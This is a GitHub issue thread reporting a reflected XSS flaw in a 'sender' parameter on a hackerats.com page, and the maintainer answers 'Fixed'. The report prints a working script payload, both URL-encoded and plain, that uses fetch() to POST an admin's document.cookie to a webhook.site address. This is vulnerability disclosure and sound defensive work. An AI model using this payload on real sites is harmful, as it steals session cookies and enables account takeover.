### ISSUE TITLE
Reflected XSS on https://hackerats.com/mentorReply.php (Severity: Medium)

### ISSUE THREAD

**Issue by CaptainNox** [The-XSS-Rat/HD-issues#18]
Hey uncle rat! It was time for me to submit another bug to you (this time via github).

The parameter 'sender' on https://hackerats.com/mentorReply.php is suffering from a reflected XSS vulnerability. Small interaction and social engineering of an attacker into making an admin click a malicious link like the following _https://hackerats.com/mentorReply.php?sender=%22%3E%3Cscript%3Efetch(%27https://webhook.site/76eb5349-e6bb-4d99-91ad-645f4f30dd67%27,%20{method:%20%27POST%27,mode:%20%27no-cors%27,body:document.cookie});%3C/script%3E_ could lead in an account takeover by leaking the admins cookie. Because of this mild user interaction needed in order to succeed the attack, I lowered the severity from high to medium.

The general XSS payload used is: _"><script>fetch('URL', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>_

I hope this bug will be patched soon and have fun patching! :)

**Comment by The-XSS-Rat** [comment]
Fixed
